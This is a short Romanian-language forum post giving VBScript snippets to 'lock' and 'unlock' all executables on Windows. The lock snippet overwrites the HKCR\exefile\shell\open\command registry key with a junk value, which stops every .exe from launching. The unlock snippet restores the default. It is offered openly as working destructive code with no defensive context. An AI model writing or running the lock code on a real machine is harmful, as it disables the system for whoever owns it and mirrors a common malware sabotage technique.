Jump to content
Ras

Lock & Unlock All Exe [VB]

Recommended Posts

Posted

Deschideti VB, selectati StandardEXE...

Codul pt Lock:

Set shl = CreateObject("wscript.shell")
shl.regwrite "HKCR\exefile\shell\open\command\", "Mehran"

Codul pt Unlock:

Set shl = CreateObject("wscript.shell")
shl.regwrite "HKCR\exefile\shell\open\command\", Chr(34) + "%1" + Chr(34) + " %*"

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...